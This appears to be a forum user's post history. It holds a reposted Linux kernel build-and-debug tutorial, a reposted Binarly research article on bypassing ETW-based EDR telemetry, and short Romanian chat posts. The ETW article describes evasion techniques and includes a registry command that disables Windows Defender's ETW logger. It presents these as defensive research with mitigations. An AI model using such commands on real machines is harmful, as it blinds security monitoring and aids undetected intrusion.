  8. Building and Debugging the Linux Kernel BY DENNIS J. MCWHERTER, JR. FEBRUARY 17, 2015 1 COMMENT TWEET LIKE +1 Recently, for the first time in a few months, I had built the latest version of the Linux kernel. In fact, since I don’t drink coffee, I decided to write this post while I waited for it to build. We’ll take a quick look through where to get the official source code, how to compile it, and what tools there are to debugging it (short of rebooting your machine for every patch, of course). That said, I will shift much of the focus of this article on to actually running the built kernel and debugging it. Where’s teh codez? The official linux source tree can be found at Kernel.org. From here you can download the source in tarball form or take the latest release (at time of writing, this is kernel v3.19 which is the tag I checked out). However, I recommend ingesting your source via git. Using git allows you to keep the tree up-to-date with the latest revisions and checkout any previous version of kernel source that you care about. In particular, I recently grabbed the source directly from the torvalds/linux.git repo. You will want to run: git clone https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/ Once you have this copy of the source code, you can move around to any source revision you like or take a tagged build. To see a list of available tags, cd into the source directory and try: git tag -l Great, this is the first step to building your kernel. If you want more help with git, see this git primer or try to search around for others. There are many git resources available out there. Building the Kernel Since we’re ready with our source code, we can build the kernel. Building the kernel is reasonably straightforward if you’re familiar with typical Makefile projects, but there are other resources that also contain more detail on this. Ramdisk (optional). The first thing I like to do is create a ramdisk. I have found that about 3GB is sufficient for this size. You can try to run something like the following to create a ram disk at the location of /media/ramdisk: sudo mkdir -p /media/ramdisk sudo mount -t tmpfs -o size=3072M tmpfs /media/ramdisk # The next command copies the repo over cp linux /media/ramdisk This improves the overall performance of the build since it can write the compiled code and read the source files out of RAM instead of off disk (i.e. disk is orders of magnitudes slower than memory). However, the initial copying of source will take some time since it is reading from disk and copying into memory. NOTE: This is an optimization and in no way necessary for compiling the Linux kernel. Likewise, upon reboot, the contents of the RAM disk will be cleared (since RAM is volatile storage). Caveat: Though I recommend performing all of your builds on your RAM disk for speed, this does cause an obvious synchronization problems between the files on your disk and the files in your ram disk. I will leave the coping mechanism to you if you’re performing active development, but one feasible solution is to simply continue using git to track your changes (perhaps an alternate remote would be useful here). Just be sure to push your changes before you delete the ram disk or reboot. Configuring the Kernel. The next step in the process is to create a configuration. You can use your current kernel’s configuration or use the default one. make defconfig The above command will create a default kernel configuration for you. Alternatively, you can use make menuconfig instead to manually configure your kernel. Open up the generated configuration (i.e. the .config file) and make sure you have set the following parameters (for debugging): CONFIG_FRAME_POINTER=y CONFIG_KGDB=y CONFIG_KGDB_SERIAL_CONSOLE=y CONFIG_DEBUG_INFO=y Build the kernel. After that, you’ll want to actually build the kernel. The machine I’m using to compile the kernel has 4 cores, so I run the following command: make -j4 At this point you’ll want to walk away and get a cup of coffee if you drink it (otherwise, write a blog post). The number passed with -j option to make signifies the number of threads you wish make to use for the compilation process (i.e. you should adjust this to be reasonable for the number of cores on your machine). With a 3GB RAM disk and 4 threads, this process takes about 15 minutes and 26 seconds on my virtual machine to compile (not bad for a VM on a dinky little laptop). Install the kernel. Congratulations, you’ve successfully built the Linux kernel on your own. Finally, we need to install the kernel so we can actually use it. sudo make modules_install install This command will put the kernel files alongside your current kernel. When this is done, you should be able to see the kernel files in /boot. Qemu Our kernel is built and now we want to test it. But naturally, we don’t want to reboot for every change (and we didn’t necessarily install it in the “right” place to do that, anyway). To do this, we’ll use qemu. Qemu is a pretty nifty little, “machine emulator and virtualizer.” This tool will allow us to boot up our compiled kernel right in software and observe its behavior. We can similarly attach gdb for debugging this process and it’s much faster than performing full reboots on our machine to test the kernel we just built. NOTE: If you’re building a custom kernel for production, it is best to use qemu for prototyping and development, but obviously you should run thorough tests on the bare-metal machines. Since qemu is software that virtualizes the hardware, it is possible that there is a bug in emulation and behavior may vary. To load our kernel in qemu, we’ll run something similar to the following line: qemu-system-x86_64 -kernel /boot/vmlinuz-3.19.0 -initrd /boot/initrd.img-3.19.0 -hda ~/rootfs.img -nographic -serial stdio -append “root=/dev/sda console=ttyS0” This little gem will start qemu and boot your recently built kernel. However, we are missing a piece at this point. Particularly, we have specified a rootfs (root filesystem) image, but we never created it. While the kernel should drop a shell even without the rootfs, it isn’t really all that useful without it. I was running this on an ubuntu VM, so we will use “qemu-debootstrap” to build this for us. dd if=/dev/zero of=~/rootfs.img bs=200M count=1 mkfs.ext2 -F ~/rootfs.img sudo mkdir /mnt/rootfs sudo mount -o loop ~/rootfs.img /mnt/rootfs sudo qemu-debootstrap –arch=i386 precise /mnt/rootfs sudo cp /etc/passwd /etc/shadow /mnt/rootfs/etc sync sudo umount /mnt/rootfs This set of commands will create a viable rootfs using ubuntu’s “precise” release as the base distribution. A quick summary follows: Create a file of zeros ~200MB in size called rootfs.img Format rootfs.img to ext2 file system Make a mount point for image Mount image to created mount point Create the rootfs for “precise” in the mounted location Copy over current system user data for login Flush file buffers (i.e. make sure we write changes) Umount disk image As you can see, all of the real work is handled for us by qemu-deboostrap. However, after we have run this, we should now be able to start qemu. After issuing the command above, you should eventually she a login prompt appear in the qemu window. Login with the credentials to your current machine (i.e. we copied /etc/passwd and /etc/shadow) and you should be able to use the system like normal. Similarly, a uname -a should show you that you’re running whatever kernel version which you just compiled. Debugging We have successfully built our kernel and loaded it up in our emulator. Next up is debugging. Note that printk (kernel’s version of printf) is still very much your friend while working in the kernel, but some things are simply better looked at under the debugger when possible. For this purpose, KGDB was born and that is why we enabled it earlier. Though the official KDB/KGDB docs are quite thorough on this topic, I will summarize here. Start the kernel. Shutdown your running kernel and modify the boot options slightly. We are going to tell kgdb to send the output to our ttyS0 at 115200 baud: qemu-system-x86_64 -kernel /boot/vmlinuz-3.19.0 -initrd /boot/initrd.img-3.19.0 -hda ~/rootfs.img -nographic -serial tcp::4444,server -append “root=/dev/sda kgdboc=ttyS0,115200” Similarly, we change how we will be interacting with our serial port. In particular, we have told qemu to listen on 0.0.0.0 port 4444 for a client until it starts. Since we only have a single serial device, this is now treated as ttyS0 instead of our console. We’ll show why this is important later. In any case, you can start your debugger now by simply running: gdb </path/to/kernel/build>/vmlinux (gdb) target remote 127.0.0.1:4444 This connects gdb at the network location we told qemu to listen on. Though this is a network connection from the host’s perspective, your kernel sees this as a direct serial connection by specifying the -serial option. Drop the kernel into debug mode. The first thing we want to do is actually put the kernel in debug mode. Login as root (or use sudo) and run the following command: echo g > /proc/sysrq-trigger If you compiled with the KDB frontend and don’t have gdb attached, you should see kdb open up in your console. If, however, you followed the steps above and attached with gdb, control of the kernel should have been passed to the debugger. From here, you can operate gdb as you would with any other program. NOTE: If you have trouble with gdb (i.e. it times out before you drop to debug mode) simply reconnect using the “target remote” command above. If it appears to be hanging when you first get into debug mode, simply stop debugging the process in gdb (i.e. CTRL + C) and reconnect. You should see a (gdb) prompt when the debugger has successfully connected to the kernel. If you want to continue kernel execution, simply type “continue.” There you have it; a more or less step-by-step guide to building and running your own version of the Linux kernel. This is more useful than just being the coolest kid amongst your friends. With this knowledge you can keep your kernel up-to-date with the latest fixes (before full point releases) and bake in any custom code into your kernel that you find useful. Happy kernel hacking! Sursa: https://deathbytape.com/articles/2015/02/17/build-debug-linux-kernel.html
  9. DESIGN ISSUES OF MODERN EDRS: BYPASSING ETW-BASED SOLUTIONS November 15, 2021 - Binarly Team As experts in firmware security, the Binarly team is frequently asked why endpoint solutions can’t detect threats originating below the operating system such as firmware implant payloads. Unfortunately, the problem requires a more complex approach and the modern architecture of Endpoint Detection & Response (EDR) solutions are weak against generic attack patterns. At Black Hat Europe 2021, Binarly researchers presented several attack vectors that weren't aimed at attacking a single solution, but instead exposed industry-wide problems. The technical details of two new UEFI bootloader-based pieces of malware (FinSpy and ESPecter), which behave similarly to classical bootkits, have been published recently. However, instead of infecting legacy bootstrap code (MBR/VBR), they attack the UEFI-based bootloader to persist below the operating system. These types of threats can influence the kernel-space before all the mitigations apply. This allows an attacker to install kernel-mode implants or rootkit code very early in the boot process. Past publicly available ETW bypasses rely on hooking/unhooking techniques to alter the executable files loading with runtime changes such as reflective code injection (You’re off the hook – Zero Nights 2016, Matrosov & Tang) With that in mind, the Binarly research chose to focus on uncovering ETW design problems and uncover attacks that affect all the solutions relying on ETW telemetry. Firmware implants to deliver operating system payloads implementing these attacks will NOT be detected by modern endpoint solutions. Design issues are the worst Event Tracing for Windows (ETW) is a built-in feature, originally designed to perform software diagnostics, and nowadays ETW is widely used by Endpoint Detection & Response (EDR) solutions. Attacks on ETW can blind a whole class of security solutions that rely on telemetry from ETW. Researching ways to disable ETW is of critical importance given that these attacks can result in disabling the whole class of EDR solutions that rely on ETW for visibility into the host events. Even more important is researching and developing ways to detect if the ETW has been tampered with and notify the security solutions in place. This topic is very important for all the experts dealing with Windows security, malware detection and incident response. Event Tracing for Windows (ETW) is a built-in Windows logging mechanism designed to observe and analyze application behavior. ETW was introduced quite a while ago (Windows XP) as a framework implemented in the kernel to troubleshoot OS components behavior and performance issues; since then, it has been expanded and improved significantly - in Windows 11, ETW can produce more than 50,000 event types from about 1,000 providers. Using ETW to collect host telemetry has the following advantages: Available system-wide, in all recent Windows OSs without having to be installed, loading any kernel drivers or OS rebooting. Supports a standardized framework to produce and consume logging events. High-speed logging that lets applications consume events in real-time or from a disk file. ETW is used to collect events in large-scale business solutions such as Docker, Amazon CloudWatch. MS SQL Server has been using ETW for more than 10 years. One of the first examples of using ETW-based tools to analyze and reveal malware behavior was presented by Mark Russinovich in his talk “Malware Hunting with the Sysinternals Tools” about 10 years ago. Since then, developers of modern EDRs have leveraged ETW to monitor security related events and successfully detect and respond to cutting-edge malware. As an example, Process Monitor from the SysInternals suite was leveraging NT Kernel Logger ETW session for network tracing. Its latest version is still relying on ETW for such visibility but a dedicated ETW session, PROCMON TRACE, was introduced. During the Black Hat Europe 2021 talk, the Binarly team demonstrated an ETW attack on Processor Monitor that resulted in blinding the SysInternals tool from any network activity. There are plenty of practical research projects demonstrating the ability of ETW to capture malicious activity or perform threat research and reverse engineering: DARPA has sponsored several ETW-based monitoring systems for malware detection Project Windows Low-Level System Monitoring Data Collection obtains data from many ETW providers, including NT Kernel Logger to reveal and reconstruct various attacks such as browser exploit attacks and malicious file download. Project MARPLE focuses on hardening enterprise security by automating the detection of APT threats. One of its modules, Holmes, collects host telemetry via ETW to produce detection signals for APT campaigns. Project APTShield uses ETW for logging system call routines. This scheme helps to detect RATs by analyzing malicious behavior, such as key logging, screen grabbing, remote shell, audio recording and unauthorized registry manipulation. MITRE-built ETW-based Security Sensor to detect process injection, capture process creation and termination, file creation and deletion events for certain filenames and paths. ETW is a hot topic in many academic papers focused mostly on detecting malicious behavior: Malware Characterization Using behavioral Components from George Mason University Detecting File-less Malicious Behavior of.NET C2 agents using ETW from University of Amsterdam Tactical Provenance Analysis for Endpoint Detection and Response Systems form University of Illinois Etc. According to the MITRE CVE database, in 2021, there is an exponential rise in the number of ETW related vulnerabilities that received a CVE number. So it is safe to assume that ETW has caught the attention of Bug hunters: As discussed, ETW is helpful for gathering telemetry to defend against attacks, but it has drawbacks. One important drawback is that ETW has an opaque structure, including undocumented providers and providers that issue undocumented events - ETW event templates are stored in the PE resource section under WEVT_TEMPLATE resource id. ETW can be leveraged by living-off-the-land malware: ETW can provide sniffer functionality for file & registry operations, process, thread & network activity ETW can provide keylogger functionality ETW can be used to flood the HDD in DDOS attacks, since events can be cached to disk in log files malware can use ETW to detect sandbox detonations some ETW providers are available only for certain Protected Process Light (PPL) processes; but malware can disable PPL on targeted processes via a kernel mode driver without causing BSOD – and next disable the “hidden” ETW providers Unfortunately for the defenders, ETW can be BYPASSED! Many ways to disable ETW logging are publicly available from passing a TRUE boolean parameter into a nt!EtwpStopTrace function to finding an ETW specific structure and dynamically modifying it or patching ntdll!ETWEventWrite or advapi32!EventWrite to return immediately thus stopping the user-mode loggers. Over the past several years, there have been many examples of malware families that implemented mitigations to evade ETW-based logging. In March 2018, Kaspersky released a report on Slingshot, a complex and unknown cyber-espionage platform targeting African and Middle East countries. Slingshot, the first-stage loader, renames the ETW-logs by appending .tmp extension to avoid leaving traces of its activity in system logs. Minisling, a module in the platform, uses Microsoft-Windows-Kernel-General ETW provider to obtain the last reboot time and the Microsoft-Windows-Kernel-Power ETW provider to obtain the last unsuccessful attempt to turn the machine off. In 2019, LockerGoga Ransomware implemented functionality to disable ETW by turning off tracing from Microsoft-Windows-WMI-Activity provider via wevtutil tool. In August 2021, TrendMicro researchers published the details of a new campaign from APT41 targeting South-China Seas countries where it was mentioned the use of 2 new shellcode loaders that can run payloads, uninstall themselves, disable ETW to evade detection, and also try out credentials. MITRE has updated the Defense Evasion category to take into account these attacks by adding a new technique called “Indicator Blocking” as a separate sub-technique to Impair Defenses technique. The ETW Threat Modeling is presented below: Threat Modeling ETW There are 5 types of attacks, designated by a different color, targeting each component of the ETW architecture: Red shows attacks on ETW from inside an Evil Process Light blue shows attacks on ETW by modifying environment variables, registry and files Orange shows attacks on user-mode ETW Providers Dark blue shows attacks on kernel-mode ETW Providers Purple shows attacks on ETW Sessions The Binarly team recapped the most important bypasses publicly available during their Black Hat Europe 2021 talk. The most up-to-date summary of the ETW attacks by category is presented below: Type of Attack Number of different techniques Attacks from inside AN EVIL process 6 Attacks on ETW environment variables, registry, and files 3 Attacks on user-mode ETW providers 11 Attacks on kernel-mode ETW providers 7 Attacks on ETW sessions 9 Total Attacks 36 New attacks discovered by Binarly REsearch Before introducing a new attack on Process Monitor presented by the Binarly team, let’s talk a bit more about ETW Sessions. An ETW session is a global object identified by a unique name that allows multiple ETW consumers to subscribe and receive events from different ETW providers. To make matters more obfuscated, there is neither API nor documentation on how to identify the session a consumer subscribes to receive events from. The EtwCheck (it will be released soon, stay tuned) is a powerful tool that can extract various kernel data including the in-memory WMI_LOGGER_CONTEXT structures for the corresponding sessions. These structures contain the sessions Security Descriptors, Flags and PIDs that can help identify the applications that subscribe to these sessions. The default number of simultaneously running sessions is 64. The NT kernel supports a maximum of 8 System Logger Sessions with hardcoded unique names. Some examples of System Session include NT Kernel Logger, Global Logger, and Circular Kernel Context Logger. NT Kernel Logger session receives telemetry from different providers implemented in the ntoskrnl.exe and OS core drivers. One important key point, which will be leveraged in the attack on Process Monitor, is that Windows supports only one active NT Kernel Logger session at any time but any application with admin privileges can start/stop this session. Process Monitor is free, and very popular for malware analysis which uses absolutely the same technology as many EDRs. To receive network events Process Monitor launches an ETW session as follows: Process Monitor version up to 3.60 uses NT Kernel Logger session. Process Monitor version 3.85 uses a session called PROCMON TRACE. Process Monitor uses ETW to sniff network events From an attacker application, the running session that Processor Monitor relies on is stopped and a fake one is started. As a result, Process Monitor stops receiving network events and relaunching it does not fix the problem. ETW Hijacker blinds Process Monitor by stopping ETW sessions To demonstrate this attack, Binarly team has developed ETW Hijacker (it will be released soon, stay tuned) which functionality is based on the following control flow: Block diagram of ETW Hijacker In the second attack introduced during the talk, the targeted application is Windows Defender and its secure ETW sessions: Logger ID Logger Name Instance GUID Registry Path 4 DefenderApiLogger {6B4012D0-22B6-464D-A553-20E9618403A2} HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger 5 DefenderAuditLogger {6B4012D0-22B6-464D-A553-20E9618403A1} HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger Each ETW session has an associated Security Descriptor, which is located in the registry in the HKLM\SYSTEM\CurrentControlSet\Control\WMI\Security key. The binary content of the security descriptor associated with DefenderApiLogger is written in the 6B4012D0-22B6-464D-A553-20E9618403A2 value and the binary content of the security descriptor associated with DefenderAuditLogger is written in the 6B4012D0-22B6-464D-A553-20E9618403A1 value under HKLM\SYSTEM\CurrentControlSet\Control\WMI\Security key. As it can be seen in the next figure, the Security Descriptor stored in the registry matched the corresponding Security Descriptor in kernel memory (WMI_LOGGER_CONTEXT.SecurityDescriptor.Object). Security descriptor for DefenderApiLogger in Registry and in the kernel memory One simple way to blind Windows Defender is to zero out registry values corresponding to its ETW sessions: reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f Windows provides QueryAllTracesW API to retrieve the properties and statistics for all ETW sessions for which the caller has permissions to query. After calling this function the execution control goes to the kernel and finally to EtwpQueryTrace function (its corresponding pseudocode shown below). As it can be seen in the pseudocode, the EtwpQueryTrace function includes several security checks to prevent returning information about a secure session to unprivileged applications. This is the reason why event apps with admin privileges can’t query the Windows Defender ETW sessions. First, the access rights of the caller are checked by comparing the session security descriptor with the process token. Second, it checks whether the queried session has its SecurityTrace flag set and implement one more check based on the PPL mechanism in the EtwCheckSecurityLoggerAccess function. EtwpQueryTrace function checks two fields: Security Descriptor and Flags. SecurityTrace By default, users cannot query information about Defender ETW sessions since they are running with high privilege and have SecurityTrace flag enabled. Both session parameters, the security descriptor and SecurityTrace flag, are stored in the WMI_LOGGER_CONTEXT structure. Malware can load a driver that patches the aforementioned values in the targeted WMI_LOGGER_CONTEXT structure to make the execution flow bypass the security checks and execute EtwpGetLoggerInfoFromContext function. Malware can patch the WMI_LOGGER_CONTEXT structure to allow querying Defender ETW sessions Now, moving to stopping secure ETW sessions, Windows provides StopTraceW function to stop the specified ETW session. After calling this function the execution control goes to the kernel and finally to EtwpStopTrace function (its corresponding pseudocode shown below). As it can be seen in the pseudocode, the EtwpStopTrace function includes several security checks to prevent stopping the targeted secure session by unprivileged applications. This is the reason why even apps with admin privileges can’t stop the Windows Defender ETW sessions. First, the session “stoppable” characteristics is checked by querying the LoggerMode field in the WMI_LOGGER_CONTEXT structure. Second, the access rights of the caller are checked by comparing the session security descriptor with the process token. EtwpStopTrace function checks LoggerMode and Security Descriptor By default, users cannot stop the Defender ETW sessions since they are running with high privilege and have been marked as non-stoppable. Both session parameters, the security descriptor and LoggerMode field, are stored in the WMI_LOGGER_CONTEXT structure. Malware can load a driver that patches the aforementioned values in the targeted WMI_LOGGER_CONTEXT structure to make the execution flow bypass the security checks and execute EtwpStopLoggerInstance function. Malware can patch the WMI_LOGGER_CONTEXT structure to allow stopping Defender ETW sessions To summarize the attack to query information about the target secure ETW session and then stop it, a malware driver has to patch three fields in the corresponding WMI_LOGGER_CONTEXT structure in memory. Summary of the Attack The demo on querying and stopping the Windows Defender ETW sessions presented during the talk can be found on Binarly YouTube channel. Windows PatchGuard is a software protection utility designed to forbid the kernel from being patched in order to prevent rootkit infections. However, we can see from the demo that PatchGuard does not protect kernel ETW structures from illegal write access. To mitigate this risk, MemoryRanger can be used. Memory Ranger is a hypervisor-based utility designed to prevent attacks on kernel memory. After loading, MemoryRanger allocates a default enclave for the OS and previously loaded drivers. MemoryRanger traps the loading of the ETW Blinder driver and moves it to the isolated kernel enclave in run-time with different memory access restrictions. Using Extended Page Table (EPT), MemoryRanger can trap access to the sensitive data and return fake data to the attacker. MemoryRanger can prevent patching ETW session structures The demo on how MemoryRanger can prevent patching the WMI_LOGGER_CONTEXT structure presented at BlackHat Europe 2021 can be found on Binarly YouTube channel. In conclusion, ETW was originally designed to perform software diagnostics, but nowadays it is widely used by various EDRs and cybersecurity solutions. It is crucial to understand the attacks on ETW because these attacks can disable the whole class of security solutions. During the talk we presented two new attacks on Process Monitor and Windows Defender and introduced two new tools that can help in identifying (EtwCheck) and preventing attacks on ETW (MemoryRanger). Going on step further, let’s assume that an attack originates in the firmware, sets persistence, executes the next-stage payload to move up in the kernel where it can implement one of the attacks shown in this presentation. This will be devastating, due to its stealth-ness and resilience to OS reinstallation or HDD replacing. That's why, today, security solutions MUST receive signals from below and above the OS to be able to respond effectively to such threats. Sursa: https://www.binarly.io/posts/Design_issues_of_modern_EDR’s_bypassing_ETW-based_solutions/index.html
  10. Playlist: https://www.youtube.com/playlist?list=PLwnDE0CN30Q9x3JMsHrRMGoLhpF8vZ1ka
  11. Pare ok platforma aia, dar tot apar probleme. Era mai frumos cand stateam toti afara si inghetam ca niste carnati.
  12. Mai sunt si alte probleme la template, precum iconite uriase cand tii mouse-ul peste un user: I-am facut update recent dar se pare ca nu le-au fixat. Nu sunt chiar atat de naspa si nu am chef sa ma chinui iar sa repar astfel de probleme, e mai greu decat pare
  13. Saptamana viitoare e Defcampu'. Deci, mergem undeva la o terasa?
  14. Eu fac bunnyhop la CS:GO si am sanse mari sa ma feresc de asa ceva.
  15. Parca era *ri# la inceput dar nu am mai testat de multi ani.
  16. Nytro

    Black Friday

    Am vazut si eu cateva reduceri reale. Nu foarte mari, dar reale.
  17. Nytro

    Black Friday

    Catalog emag: https://gadget.ro/catalogul-emag-pentru-black-friday-2021/ Pareri?
  18. Ne strangem undeva sa bem si sa facem streaming? Conditia ar fi sa avem toti bilete. @Andrei ?
  19. Scade numarul de cazuri, nu se face ceva si fizic?
  20. Nytro

    Deep/dark web

    Mai degraba vorbesti prin spitale daca e vorba de asa ceva...
  21. Nytro

    Deep/dark web

    Salut, mie mi se pare o mare porcarie. Intr-adevar, poate ai sanse mai mari acolo sa gasesti cine stie ce droguri sau alte porcarii, dar in afara de asta nu e util la nimic. Astept si eu niste pareri diferite, poate ma insel. Referitor la "hacking", am gasit doar mizerii de acum 30 de ani parca scrise de copii de 12 ani in pauzele de la CS:GO.
  22. Am putea inchiria un bar ceva, cu TV, facem stream de acolo si bem.
  23. DefCamp 2021 will move fully ONLINE https://def.camp/defcamp-2021-will-move-fully-online/
  24. Sunt vaccinat si nu am patit nimic. M-am vaccinat deoarece am decompilat vaccinul in IDA Pro si am vazut ce contine. Deschide un port pentru bere si ruleaza un shellcode obfuscat pentru dorinta de a bea. Din analiza statica heuristica realizata peste ARN-ul mesager putem banui ca firma Corona se afla in spatele acestui vaccin.
×
×
  • Create New...